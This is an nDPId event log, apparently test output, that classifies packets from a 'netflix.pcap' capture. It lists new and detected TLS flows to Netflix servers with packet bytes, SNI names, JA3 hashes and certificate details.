+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"} +00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
+00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="} 